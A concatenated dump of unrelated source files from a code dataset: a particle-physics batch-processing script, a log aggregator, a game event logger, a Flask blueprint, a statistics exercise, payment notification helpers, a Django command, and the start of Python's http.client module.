elif case == 'momResolution': cmd = 'hadd -f momentumResolution-'+str(N)+'.root '
else: cmd = 'hadd -f momDistributions-'+str(N)+'.root '
if (case == 'residuals' and not x.find('histos-residuals')<0 ): cmd += x+" "
elif (case == 'momResolution' and not x.find('momentumResolution')<0 ): cmd += x+" "
elif (case == 'momDistribution' and not x.find('analysis')<0 ): cmd += x+" "
n+=1
if n==500:
os.system(cmd)
n=0
N+=1
    if n>0: os.system(cmd)  # merge the last, partially filled batch
    else: N-=1              # file count was an exact multiple of 500, no batch N
    if case == 'residuals': histname = 'residuals.root '
    elif case == 'momResolution': histname = 'momentumResolution.root '
    else: histname = 'momDistributions.root '
    cmd = 'hadd -f '+histname
    for n in range(1,N+1):
        cmd += histname.replace('.','-'+str(n)+'.')
os.system(cmd)
def redoMuonTracks():
fileList,x,y = checkFilesWithTracks(D='.')
for df in fileList:
tmp = df.split('/')
if len(tmp)>1:
os.chdir(tmp[0])
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoMuonTaggerTracks -u 1 -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def splitOffBoostedEvents(splitFactor=5,check=False):
remote = "/home/truf/ship-ubuntu-1710-32/muflux/simulation/"
dirList=getFilesLocal(remote)
for d in dirList:
if not os.path.isdir(d): os.system('mkdir '+d)
os.chdir(d)
for f in os.listdir(remote+'/'+d):
if f.find('histo')<0 and not f.find('ship.conical')<0:
if not check:
os.system('cp '+remote+'/'+d+'/'+f+' .')
cmd = "python /home/truf/muflux/simulation/drifttubeMonitoring.py -c splitOffBoostedEvents -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
else:
# check
f99 = f.replace('.root','_dimuon99.root')
f1 = f.replace('.root','_dimuon1.root')
l = os.listdir('.')
if not f in l or not f99 in l or f1 in l:
print 'something wrong',d,f
print f,f in l
print f99,f99 in l
print f1,f1 in l
os.chdir('../')
def runMufluxReco(D='1GeV',merge=False):
N = 24
ncpus = 8
if merge:
cmd = "hadd sumHistos--simulation10GeV-repro.root "
for n in range(ncpus):
cmd += "sumHistos--simulation10GeV-repro-"+str(n)+".root "
os.system(cmd)
else:
t='repro'
if D=='1GeV':
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation1GeV-"+t+" -c MufluxReco -A True &"
os.system(cmd)
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation1GeV-"+t+" -c MufluxReco -C True &"
os.system(cmd)
elif D=='10GeV':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation10GeV-"+t+" -c MufluxReco -B True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif D=='Jpsi':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d JpsiProduction -c MufluxReco -J True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif D=='JpsiP8':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d JpsiProduction -c MufluxReco -8 True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
def runInvMass(MC='1GeV',merge=False):
N = 20
t='repro'
if not merge:
if MC=='Jpsi':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d JpsiProduction -t "+t+" -c invMass -p ship-ubuntu-1710-48 -s "+str(n)+ " -x "+str(N)+" -J True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
if MC=='JpsiP8':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d JpsiProduction_P8 -t "+t+" -c invMass -p ship-ubuntu-1710-16 -s "+str(n)+ " -x "+str(N)+" -8 True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif MC=='1GeV':
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d simulation1GeV-"+t+" -t "+t+" -c invMass -p ship-ubuntu-1710-48 -A True -r &"
print cmd
os.system(cmd)
elif MC=='10GeV':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d simulation10GeV-"+t+" -t "+t+" -c invMass -p ship-ubuntu-1710-48 -s "+str(n)+ " -x "+str(N)+" -B True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
else:
print "case not known, stop"
1/0
else:
if MC=='Jpsi' or MC=='JpsiP8':
cmd = 'hadd -f invMass-MC-Jpsi.root '
for n in range(N):
cmd+='invMass-MC-'+str(n)+'_refit.root '
os.system(cmd)
cmd = 'hadd -f ntuple-invMass-MC-Jpsi.root '
for n in range(N):
cmd+='ntuple-invMass-MC-'+str(n)+'_refit.root '
os.system(cmd)
else:
x=''
if t=='repro': x='_refit'
cmd = 'hadd -f invMass-MC-'+MC+x+'.root '
for n in range(N):
cmd+='invMass-MC-'+str(n)+x+'.root '
os.system(cmd)
cmd = 'hadd -f ntuple-invMass-MC-'+MC+x+'.root '
for n in range(N):
cmd+='ntuple-invMass-MC-'+str(n)+x+'.root '
os.system(cmd)
def checkStatistics(splitFactor=5):
# 1GeV mbias 1.8 Billion PoT charm 10.2 Billion PoT
simFiles = getFilesFromEOS() # input data
reco,x,y = checkFilesWithTracks() #
Nsim = {'mbias':0,'charm':0}
Nreco = {'mbias':0,'charm':0}
for f in simFiles:
if f.find('charm')>0: Nsim['charm']+=simFiles[f]
else: Nsim['mbias'] += simFiles[f]
allFiles = {}
for a in simFiles.keys():
x = a.split('/')
allFiles[x[len(x)-1].replace('.root','')]=simFiles[a]
for dname in allFiles:
n = 0
for x in reco:
if not x.find(dname)<0: n+=1
fraction = n/float(splitFactor)
print "fraction:",dname,fraction
if dname.find('charm')>0: Nreco['charm']+=fraction*allFiles[dname]
else: Nreco['mbias'] += fraction*allFiles[dname]
print "total statistics, simulated ",Nsim
print " , reconstructed ",Nreco
# mbias statistics = 1.8 * Nreco/Nsim, charm statistics = 10.2 * Nreco/Nsim
# norm factor = 1/charm statistics * mbias statistics
print "internal MC normalization, to be applied to charm", 1.8*Nreco['mbias']/Nsim['mbias'] /(10.2*Nreco['charm']/Nsim['charm'])
def mergeOnurFiles(merge=False):
if not merge:
eospath = "/eos/experiment/ship/user/odurhan/Muflux-Digi"
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospath,shell=True)
fl = []
for x in temp.split('\n'):
if x.find('dig.root')<0: continue
d = x[x.rfind('/')+1:]
fin = ROOT.TFile.Open(os.environ['EOSSHIP']+eospath+'/'+d)
if not fin: continue
t = fin.Get('cbmsim')
if not t: continue
if not t.FindBranch('FitTracks'): continue
fout = ROOT.TFile(d,'recreate')
sTree = t.CloneTree(0)
nEvents = 0
pointContainers = []
for b in sTree.GetListOfBranches():
name = b.GetName()
if not name.find('Point')<0: pointContainers.append('sTree.'+name+'.GetEntries()') # makes use of convention that all sensitive detectors fill XXXPoint containers
for n in range(t.GetEntries()):
rc = t.GetEvent(n)
empty = True
for p in pointContainers:
if eval(p)>0: empty = False
if not empty:
rc = sTree.Fill()
nEvents+=1
sTree.AutoSave()
fout.Close()
print("removed empty events, left with:", nEvents)
            fin.SetWritable(False) # bypass flush error
else:
N=0
cmd = 'hadd -f ship.conical.FixedTarget-TGeant4_merged_dig.root '
for x in os.listdir('.'):
N+=1
cmd += x+' '
if N%500==0:
os.system(cmd)
os.system('cp ship.conical.FixedTarget-TGeant4_merged_dig.root tmp.root')
cmd = 'hadd -f ship.conical.FixedTarget-TGeant4_merged_dig.root tmp.root '
os.system(cmd)
def JpsiProduction(step='simulation',prod='P8'):
# directory should be ship-ubuntu-1710-48/JpsiProduction
path = {}
path['Cascade'] ="ship-ubuntu-1710-48_run_MufluxfixedTarget_XXX/"
path['P8'] ="ship-ubuntu-1710-16_run_MufluxfixedTarget_XXX/"
ncpus = 16
Ntot = {'Cascade':20313583,'P8':2293179}
InFile = {'Cascade':"/eos/experiment/ship/data/jpsicascade/cascade_MSEL61_20M.root" ,
'P8':"/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/Jpsi-Pythia8_21788000000_0-3074.root"}
Nstart = 0
delN = int(float(Ntot[prod])/float(ncpus))
if step == 'simulation':
for n in range(ncpus):
cmd = "python $SHIPBUILD/FairShip/muonShieldOptimization/run_MufluxfixedTarget.py -C -P -I "+ InFile[prod] +" -J -e 10. -n "+str(delN)+" -S "+str(Nstart)+ " -r "+str(n)+" &"
Nstart+=delN
os.system(cmd)
if step == 'digi':
for n in range(ncpus):
d = path[prod].replace('XXX',str(n))
os.chdir(d)
mcFile = 'pythia8_Geant4_'+str(n)+'_10.0.root'
if mcFile.replace('.root','_dig.root') in os.listdir('.'):
print "File already exists, skip",mcFile.replace('.root','_dig.root')
os.chdir('../')
continue
geoFile = 'geofile_full.root'
cmd = "python $FAIRSHIP/macro/runMufluxDigi.py -n 9999999 -f "+mcFile+" -g "+geoFile+" &"
print 'step digi:', cmd,' in directory ',d
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('runMufluxDigi')<ncpus/2: break
time.sleep(100)
if step == 'reco':
for n in range(ncpus):
d = path[prod].replace('XXX',str(n))
os.chdir(d)
recoFile = 'pythia8_Geant4_'+str(n)+'_10.0_dig.root'
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoStep1 -u 1 -f "+recoFile+' &'
print 'step reco:', cmd,' in directory ',d
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus/2: break
time.sleep(100)
print "finished all the ",step," tasks"
def JpsiCopyToEOS(RT=False,prod='P8'):
ncpus = range(16)
dirName={}
dirName['P8'] ="ship-ubuntu-1710-16_run_MufluxfixedTarget_XX/"
dirName['Cascade']="ship-ubuntu-1710-48_run_MufluxfixedTarget_XX/"
eosPath = {}
eosPath['P8'] =" $EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
eosPath['Cascade'] =" $EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction/"
for n in ncpus:
fileName = "pythia8_Geant4_"+str(n)+"_10.0.root"
if RT=='RT': fileName = fileName.replace('.root','_dig_RT.root')
if RT=='ntuple': fileName = 'ntuple-'+fileName.replace('.root','_dig_RT.root')
cmd = "xrdcp "+dirName[prod].replace('XX',str(n))+fileName+eosPath[prod]+fileName
print cmd
rc = os.system(cmd)
# if rc == 0: os.system('rm '+dirName+fileName)
def JpsiHistos(command = "anaResiduals",prod = 'P8',merge=False):
# MCJpsiProd
if prod == 'Cascade': D = "$EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction/"
elif prod == 'P8': D = "$EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
else:
print prod," not supported"
exit()
cmd = 'hadd -f '+commandToSum[command]+'.root '
for n in [1]:
# for n in range(16):
if prod == 'Cascade': dirName = "ship-ubuntu-1710-48_run_MufluxfixedTarget_"+str(n)
if prod == 'P8': dirName = "ship-ubuntu-1710-16_run_MufluxfixedTarget_"+str(n)
fileName = "pythia8_Geant4_"+str(n)+"_10.0_dig_RT.root"
if not merge:
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+D+fileName+' &'
os.chdir(dirName)
print 'execute:', cmd
os.system(cmd)
os.chdir('../')
else:
cmd += dirName+'/'+commandToHist[command]+fileName+' '
if merge: os.system(cmd)
from array import array
def extractJpsi(prod = '10GeV'):
Fntuple = 'JpsifromBackground-'+prod+'.root'
ftup = ROOT.TFile.Open(Fntuple, 'RECREATE')
Ntup = ROOT.TNtuple("pythia8","pythia8 Jpsi","id:px:py:pz:E:M:mid:mpx:mpy:mpz:mE:mM")
template={}
template['10GeV'] = ['/eos/experiment/ship/data/Mbias/background-prod-2018/pythia8_Geant4_10.0_cXXXX_mu.root',67]
template['1GeV'] = ['/eos/experiment/ship/data/Mbias/background-prod-2018/pythia8_Geant4_1.0_cXXXX_mu.root',20]
for n in range(0,template[prod][1]):
fname = template[prod][0].replace('XXXX',str(n*1000))
f=ROOT.TFile.Open(os.environ['EOSSHIP']+fname)
print "opening ",fname,f.cbmsim.GetEntries()
for event in f.cbmsim:
jpsi = False
for m in event.MCTrack:
if m.GetPdgCode()==443:
jpsi = True
break
if not jpsi: continue
vl=array('f')
vl.append(float(m.GetPdgCode()))
vl.append(m.GetPx())
vl.append(m.GetPy())
vl.append(m.GetPz())
vl.append(m.GetEnergy())
vl.append(m.GetMass())
vl.append(float(event.MCTrack[1].GetPdgCode()))
vl.append(event.MCTrack[0].GetPx())
vl.append(event.MCTrack[0].GetPy())
vl.append(event.MCTrack[0].GetPz())
vl.append(event.MCTrack[0].GetEnergy())
if m.GetMotherId() < 0:
vl.append(-1)
else:
vl.append(float(event.MCTrack[m.GetMotherId()].GetPdgCode()))
rc = Ntup.Fill(vl)
ftup.cd()
Ntup.Write()
ftup.Close()
| [
"[email protected]"
] | |
2b3018fd53876b1bd94dc8c35c89202502fb585b | 13131e0e4805aa48bf64647f5da666e2e72dab9a | /misc/aggregate_logs_and_stats.py | 1b29c5437f03387cef5aede4d88bb57b7142ffbc | [] | no_license | m-bain/collaborative-experts | 4ae6632f0ec36b612b768048b2daa623d8b4c385 | 3a224ecad6fe36722112181c3ac48f918a799081 | refs/heads/master | 2021-01-08T19:43:14.689074 | 2020-02-16T06:05:06 | 2020-02-16T06:05:06 | 242,124,924 | 1 | 0 | null | 2020-02-21T11:35:41 | 2020-02-21T11:35:40 | null | UTF-8 | Python | false | false | 2,161 | py | """Aggregate logs across multiple seeded runs and summarise their statistics.
"""
import argparse
import logging
from pathlib import Path
from collections import OrderedDict
from utils.util import read_json
from logger.log_parser import log_summary
def summarise(group_id, log_dir="data/saved/log", model_dir="data/saved/models"):
seeded_runs = sorted(list(Path(log_dir).glob(f"**/{group_id}/seed-*")))
print(f"Found a total of {len(seeded_runs)} seed runs in {group_id}")
info_logs = OrderedDict()
for seeded_run in seeded_runs:
info_log_matches = list(Path(seeded_run).glob("**/info.log"))
msg = f"expected to find a single info.log file, found {len(info_log_matches)}"
assert len(info_log_matches) == 1, msg
info_logs[seeded_run.stem] = info_log_matches[0]
summary_log = []
for seeded_run, info_log_path in info_logs.items():
with open(info_log_path, "r") as f:
log = f.read().splitlines()
summary_log.extend(log)
first_info_log = list(info_logs.values())[0]
summary_log_name = f"summary-{'_'.join(list(info_logs.keys()))}.json"
summary_log_path = first_info_log.parent / summary_log_name
with open(summary_log_path, "w") as f:
f.write("\n".join(summary_log))
print(f"Wrote summary log to {summary_log_path}")
# retrieve the config from the first run
rel_path = first_info_log.relative_to(log_dir).parent
config_path = Path(model_dir) / rel_path / "config.json"
assert config_path.exists(), f"Could not find config at {config_path}"
config = read_json(config_path)
logger = logging.getLogger("summary")
logging.basicConfig(filename=summary_log_path, level=logging.INFO)
logger.addHandler(logging.StreamHandler())
log_summary(
logger=logger,
log_path=summary_log_path,
eval_mode=config["eval_mode"],
fixed_num_epochs=config["trainer"]["epochs"],
)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--group_id", default="ed53d01d")
args = parser.parse_args()
summarise(group_id=args.group_id)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
6b39dee81dd9f2c3d18cd4ad5ec017627ab539e7 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/spacecomponents/server/eventLogger.py | fb49f52c4e8741c49e6cc178d8184b066a6f509d | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,022 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\spacecomponents\server\eventLogger.py
from eveexceptions.exceptionEater import ExceptionEater
EVENT_DECAYED = 'spacecomponent::decay_Decayed'
EVENT_BECOMEACTIVE = 'spacecomponent::activate_BecomeActive'
class EventLogger(object):
def __init__(self, eventLog, solarSystemID):
self.eventLog = eventLog
self.solarSystemID = solarSystemID
def LogDecayed(self, item):
self.LogItemAndTypeOwnerEvent(EVENT_DECAYED, item)
def LogBecomeActive(self, item):
self.LogItemAndTypeOwnerEvent(EVENT_BECOMEACTIVE, item)
def LogItemAndTypeOwnerEvent(self, eventName, item):
with ExceptionEater('eventLog'):
self.eventLog.LogOwnerEvent(eventName, item.ownerID, self.solarSystemID, item.itemID, item.typeID)
self.eventLog.LogOwnerEventJson(eventName, item.ownerID, self.solarSystemID, componentItemID=item.itemID, componentTypeID=item.typeID)
| [
"[email protected]"
] | |
b0a3d83e3ea47c4f5c9fbde1b07b287a2ff2fa15 | 011823c0aa4335db3a523107b0916dbc2ca2c8c1 | /app/main/__init__.py | 93e67d393286660ada0d04eecdb31d8460c288a1 | [
"MIT"
] | permissive | VirginiaNdungu1/Gypsy | 570b3a84497528e71a27cb2634794021e8a5a2e3 | fe610f0087061c77b1a18ca184ae426ad92ec0b9 | refs/heads/master | 2021-07-25T09:02:08.090011 | 2017-11-06T06:48:37 | 2017-11-06T06:48:37 | 109,368,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views, forms
| [
"[email protected]"
] | |
ad194816a6379fa3222c48a90e327ef99945ece2 | a8b17b17f9b2a640013064c50e1cebc27a7a68de | /16-statistical-thinking-in-python-pt2/01-parameter-estimation-by-optimization/01-how-often-do-we-get-no-hitters.py | 8e07aef449d1b4f71f6836c43205c929a66754b4 | [] | no_license | JohnnyFang/datacamp | 20eae09752521f14006cb3fda600b10bd7b12398 | 0fa8fa7682c23b0eb07bd03e4b75f5b77aeafa75 | refs/heads/master | 2020-04-18T00:27:37.358176 | 2020-02-04T20:54:19 | 2020-02-04T20:54:19 | 167,078,316 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,031 | py | '''
How often do we get no-hitters?
The number of games played between each no-hitter in the modern era (1901-2015) of Major League Baseball is stored in the array nohitter_times.
If you assume that no-hitters are described as a Poisson process, then the time between no-hitters is Exponentially distributed. As you have seen, the Exponential distribution has a single parameter, which we will call τ, the typical interval time. The value of the parameter τ that makes the exponential distribution best match the data is the mean interval time (where time is in units of number of games) between no-hitters.
Compute the value of this parameter from the data. Then, use np.random.exponential() to "repeat" the history of Major League Baseball by drawing inter-no-hitter times from an exponential distribution with the τ you found and plot the histogram as an approximation to the PDF.
NumPy, pandas, matplotlib.pyplot, and seaborn have been imported for you as np, pd, plt, and sns, respectively.
Instructions
Seed the random number generator with 42.
Compute the mean time (in units of number of games) between no-hitters.
Draw 100,000 samples from an Exponential distribution with the parameter you computed from the mean of the inter-no-hitter times.
Plot the theoretical PDF using plt.hist(). Remember to use keyword arguments bins=50, normed=True, and histtype='step'. Be sure to label your axes.
Show your plot.
'''
# Seed random number generator
np.random.seed(42)
# Compute mean no-hitter time: tau
tau = np.mean(nohitter_times)
# Draw out of an exponential distribution with parameter tau: inter_nohitter_time
inter_nohitter_time = np.random.exponential(tau, 100000)
# Plot the PDF and label axes
_ = plt.hist(inter_nohitter_time,
bins=50, normed=True, histtype='step')
_ = plt.xlabel('Games between no-hitters')
_ = plt.ylabel('PDF')
# Show the plot
plt.show()
# We see the typical shape of the Exponential distribution, going from a maximum at 0 and decaying to the right.
| [
"[email protected]"
] | |
6bf01c4d7cdaa26a436edc642c3871f8a1df6b49 | 9be5b6259e4db9a9386d5e6eea59bfb4ed4ccdbd | /liberapay/notifications/web.py | d3677868d705e6ac8647ec0f6c6f06ec7f41dc0b | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | Changaco/liberapay.com | b3e040ed24d47a6ebccdd0b2285526f02b4103cc | 4d134508c911f23478e80b8d8ff62223b866bb5e | refs/heads/master | 2021-01-16T21:47:57.475734 | 2015-09-02T15:41:50 | 2015-09-02T15:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from __future__ import division, print_function, unicode_literals
def withdrawal_failed(_, user, exchange):
href = '/%s/receiving/payout?exchange_id=%s' % (user.username, exchange.id)
return ('danger',
['a',
{'href': href}, _("The transfer to your bank account has failed!"),
]
)
def withdrawal_pending(_, user, exchange, Money):
return ('success',
['span', _("We have initiated a transfer of {0} from your Liberapay wallet to your bank account.",
Money(exchange.amount - exchange.fee, 'EUR'))
]
)
def charge_failed(_, user, exchange, Money):
href = '/%s/giving/payin?exchange_id=%s' % (user.username, exchange.id)
return ('danger',
['a', {'href': href},
_("We tried to charge your credit card {0}, but it failed!",
Money(exchange.amount + exchange.fee, 'EUR'))
]
)
def charge_succeeded(_, user, exchange, Money):
return ('success',
['span', _("We charged your credit card {0} to fund your ongoing donations.",
Money(exchange.amount + exchange.fee, 'EUR'))
]
)
def pledgee_joined(_, user_name, platform, profile_url):
return ('info',
['a',
{'href': profile_url},
_("{0} from {1} has joined Liberapay!", user_name, platform),
]
)
| [
"[email protected]"
] | |
cdf4bd815623a394fb53085fd197221e82e966f1 | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/django-1.5/django/conf/project_template/manage.py | 2e8e79612df8fd85e1f1355b06620fb5cc2dfa6d | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/django-1.5/django/conf/project_template/manage.py | [
"[email protected]"
] | |
5186b10cd80cab8f8320b0162dfd8881526c443f | 93a613f09d564a1d45ecc01b54b73745ce2850b7 | /majora2/management/commands/load_counties.py | 7e60d9acd4fc67489980ad313b871f818eb9608d | [] | no_license | pythseq/majora | fa17c77fa8a916c688fd2b40744d768dd851b99b | 40b918d32b4061cddee5f7279f97e70eb894623d | refs/heads/master | 2022-12-23T20:09:41.233844 | 2020-09-28T18:18:42 | 2020-09-28T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from django.core.management.base import BaseCommand, CommandError
from majora2 import models
class Command(BaseCommand):
help = "Load a list of counties"
def add_arguments(self, parser):
parser.add_argument('filename')
def handle(self, *args, **options):
fh = open(options["filename"])
for line in fh:
fields = line.strip().split('\t')
country_code = fields[0]
name = fields[1]
c, created = models.County.objects.get_or_create(country_code=country_code, name=name)
c.save()
| [
"[email protected]"
] | |
dc1979d0dfa2472504e14ad8cf2ef93d203ce0fe | 524591f2c4f760bc01c12fea3061833847a4ff9a | /arm/usr/lib/python3.5/http/client.py | 350313e87b32e275ac2f296b563f6f75845c6073 | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | Roboy/roboy_plexus | 6f78d45c52055d97159fd4d0ca8e0f32f1fbd07e | 1f3039edd24c059459563cb81d194326fe824905 | refs/heads/roboy3 | 2023-03-10T15:01:34.703853 | 2021-08-16T13:42:54 | 2021-08-16T13:42:54 | 101,666,005 | 2 | 4 | BSD-3-Clause | 2022-10-22T13:43:45 | 2017-08-28T16:53:52 | C++ | UTF-8 | Python | false | false | 48,714 | py | """HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|\_____________________________
| | getresponse() raises
| response = getresponse() | ConnectionError
v v
Unread-response Idle
[Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
import email.parser
import email.message
import http
import io
import os
import re
import socket
import collections
from urllib.parse import urlsplit
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
__all__ = ["HTTPResponse", "HTTPConnection",
"HTTPException", "NotConnected", "UnknownProtocol",
"UnknownTransferEncoding", "UnimplementedFileMode",
"IncompleteRead", "InvalidURL", "ImproperConnectionState",
"CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
"BadStatusLine", "LineTooLong", "RemoteDisconnected", "error",
"responses"]
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
# hack to maintain backwards compatibility
globals().update(http.HTTPStatus.__members__)
# another hack to maintain backwards compatibility
# Mapping status codes to official W3C names
responses = {v: v.phrase for v in http.HTTPStatus.__members__.values()}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
# maximal line length when calling readline().
_MAXLINE = 65536
_MAXHEADERS = 100
# Header name/value ABNF (http://tools.ietf.org/html/rfc7230#section-3.2)
#
# VCHAR = %x21-7E
# obs-text = %x80-FF
# header-field = field-name ":" OWS field-value OWS
# field-name = token
# field-value = *( field-content / obs-fold )
# field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ]
# field-vchar = VCHAR / obs-text
#
# obs-fold = CRLF 1*( SP / HTAB )
# ; obsolete line folding
# ; see Section 3.2.4
# token = 1*tchar
#
# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*"
# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
# / DIGIT / ALPHA
# ; any VCHAR, except delimiters
#
# VCHAR defined in http://tools.ietf.org/html/rfc5234#appendix-B.1
# the patterns for both name and value are more lenient than RFC
# definitions to allow for backwards compatibility
_is_legal_header_name = re.compile(rb'[^:\s][^:\r\n]*').fullmatch
_is_illegal_header_value = re.compile(rb'\n(?![ \t])|\r(?![ \t\n])').search
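# Illustrative checks against the two patterns above (not exhaustive):
#   _is_legal_header_name(b'Content-Type')   -> match  (valid token)
#   _is_legal_header_name(b'Bad:Name')       -> None   (':' is not allowed)
#   _is_illegal_header_value(b'text/html')   -> None   (value is fine)
#   _is_illegal_header_value(b'a\r\nb')      -> match  (bare CR/LF is rejected)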
# We always set the Content-Length header for these methods because some
# servers will otherwise respond with a 411
_METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
def _encode(data, name='data'):
"""Call data.encode("latin-1") but show a better error message."""
try:
return data.encode("latin-1")
except UnicodeEncodeError as err:
raise UnicodeEncodeError(
err.encoding,
err.object,
err.start,
err.end,
"%s (%.20r) is not valid Latin-1. Use %s.encode('utf-8') "
"if you want to send it encoded in UTF-8." %
(name.title(), data[err.start:err.end], name)) from None
class HTTPMessage(email.message.Message):
# XXX The only usage of this method is in
# http.server.CGIHTTPRequestHandler. Maybe move the code there so
# that it doesn't need to be part of the public API. The API has
# never been defined so this could cause backwards compatibility
# issues.
def getallmatchingheaders(self, name):
"""Find all header lines matching a given header name.
Look through the list of headers and find all lines matching a given
header name (and their continuation lines). A list of the lines is
returned, without interpretation. If the header does not occur, an
empty list is returned. If the header occurs multiple times, all
occurrences are returned. Case is not important in the header name.
"""
name = name.lower() + ':'
n = len(name)
lst = []
hit = 0
for line in self.keys():
if line[:n].lower() == name:
hit = 1
elif not line[:1].isspace():
hit = 0
if hit:
lst.append(line)
return lst
def parse_headers(fp, _class=HTTPMessage):
"""Parses only RFC2822 headers from a file pointer.
email Parser wants to see strings rather than bytes.
But a TextIOWrapper around self.rfile would buffer too many bytes
from the stream, bytes which we later need to read as bytes.
So we read the correct bytes here, as bytes, for email Parser
to parse.
"""
headers = []
while True:
line = fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
headers.append(line)
if len(headers) > _MAXHEADERS:
raise HTTPException("got more than %d headers" % _MAXHEADERS)
if line in (b'\r\n', b'\n', b''):
break
hstring = b''.join(headers).decode('iso-8859-1')
return email.parser.Parser(_class=_class).parsestr(hstring)
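# A small, self-contained sketch of parse_headers() (illustrative only; the
# in-memory buffer stands in for a socket file object):
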